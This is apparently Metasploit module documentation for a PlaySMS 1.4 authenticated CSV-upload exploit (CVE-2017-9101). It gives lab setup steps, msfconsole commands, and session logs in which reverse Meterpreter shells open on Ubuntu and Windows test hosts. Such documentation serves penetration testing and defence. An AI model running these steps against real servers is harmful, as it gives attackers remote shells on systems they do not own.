## Description
A malicious file can be uploaded by an authenticated attacker through the import.php (aka the Phonebook import feature) in PlaySMS version 1.4. Additional information and vulnerabilities can be viewed on Exploit-DB [42044]( https://www.exploit-db.com/exploits/42044/) and [CVE-2017-9101](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9101)

## Verification Steps
Available at [Exploit-DB](https://www.exploit-db.com/apps/577b6363d3e8baf4696744f911372ea6-playsms-1.4.tar.gz)

### Vulnerable Application Installation Setup.
 1. Download Application : `wget https://www.exploit-db.com/apps/577b6363d3e8baf4696744f911372ea6-playsms-1.4.tar.gz`
 2. Extract : `tar -xvf 577b6363d3e8baf4696744f911372ea6-playsms-1.4.tar.gz`
 3. Move In WebDirectory : `mv playsms-1.4/web/* /var/www/html/`
 4. make config file: `cp /var/www/html/config-dist.php /var/www/html/config.php`
 5. Change Owner : `chown -R www-data:www-data /var/www/html/`
 6. Set DB creds in config.php File. And dump playsms-1.4/db/playsms.sql in your playsms database.
 7. Now Visit : http://localhost/

## Verification Steps

 1. Install the application
 2. Start msfconsole
 3. Do: `use exploit/multi/http/playsms_uploadcsv_exec`
 4. Do: `set rport <port>`
 5. Do: `set rhost <ip>`
 6. Do: `set targeturi SecreTSMSgatwayLogin`
 7. Do: `set username touhid`
 8. Do: `set password diana`
 9. Do: `check`
```
[*] 10.22.1.10:80 The target appears to be vulnerable.
```
 10. Do: `set lport <port>`
 11. Do: `set lhost <ip>`
 12. Do: `exploit`
 13. You should get a shell.

## Scenarios
### Playsms on Ubuntu Linux
```
msf > use exploit/multi/http/playsms_uploadcsv_exec                                             
msf exploit(multi/http/playsms_uploadcsv_exec) > set rhost 10.22.1.7
rhost => 10.22.1.7
msf exploit(multi/http/playsms_uploadcsv_exec) > set targeturi SecreTSMSgatwayLogin
targeturi => SecreTSMSgatwayLogin
msf exploit(multi/http/playsms_uploadcsv_exec) > check 
[*] 10.22.1.7:80 The target appears to be vulnerable.
msf exploit(multi/http/playsms_uploadcsv_exec) > set username touhid
username => touhid
msf exploit(multi/http/playsms_uploadcsv_exec) > set password diana
password => diana
msf exploit(multi/http/playsms_uploadcsv_exec) > set lhost 10.22.1.3 
lhost => 10.22.1.3
msf exploit(multi/http/playsms_uploadcsv_exec) > run 

[*] Started reverse TCP handler on 10.22.1.3:4444 
[+] X-CSRF-Token for login : c9ad6a45cd206228554b237985b344ef
[*] Trying to Login ......
[+] Authentication successful: touhid:diana
[+] X-CSRF-Token for upload : 112cd5ecbdf12daf60391609d19ae3d6
[*] Trying to upload malicious CSV file ....
[*] Sending stage (37543 bytes) to 10.22.1.7
[*] Meterpreter session 2 opened (10.22.1.3:4444 -> 10.22.1.7:56580) at 2018-03-25 17:42:43 +0530

meterpreter > sysinfo 
Computer    : Dina
OS          : Linux Dina 3.2.0-23-generic-pae #36-Ubuntu SMP Tue Apr 10 22:19:09 UTC 2012 i686
Meterpreter : php/linux
meterpreter > 

```
### Playsms on Windows 7
```
msf > use exploit/multi/http/playsms_uploadcsv_exec                                             
msf exploit(multi/http/playsms_uploadcsv_exec) > set rhost 10.22.1.9
rhost => 10.22.1.9 
msf exploit(multi/http/playsms_uploadcsv_exec) > set targeturi web
targeturi => web
msf exploit(multi/http/playsms_uploadcsv_exec) > check 
[*] 10.22.1.9:80 The target appears to be vulnerable.
msf exploit(multi/http/playsms_uploadcsv_exec) > set username test
username => test
msf exploit(multi/http/playsms_uploadcsv_exec) > set password metasploit
password => metasploit
msf exploit(multi/http/playsms_uploadcsv_exec) > set verbose true
verbose => true
msf exploit(multi/http/playsms_uploadcsv_exec) > exploit 

[*] Started reverse TCP handler on 10.22.1.3:4444 
[+] X-CSRF-Token for login : cf467bf4829b355a5f4f2964e853ff2c
[*] Trying to Login ......
[+] Authentication successful: test:metasploit
[+] X-CSRF-Token for upload : 3aca00c2d6a5988ed74fa7d992e14904
[*] Trying to upload malicious CSV file ....
[*] Sending stage (37543 bytes) to 10.22.1.9
[*] Meterpreter session 1 opened (10.22.1.3:4444 -> 10.22.1.9:50065) at 2018-03-25 17:27:57 +0530

meterpreter > sysinfo 
Computer    : TOUHID-PC
OS          : Windows NT TOUHID-PC 6.1 build 7600 (Windows 7 Ultimate Edition) i586
Meterpreter : php/windows
meterpreter > 

```
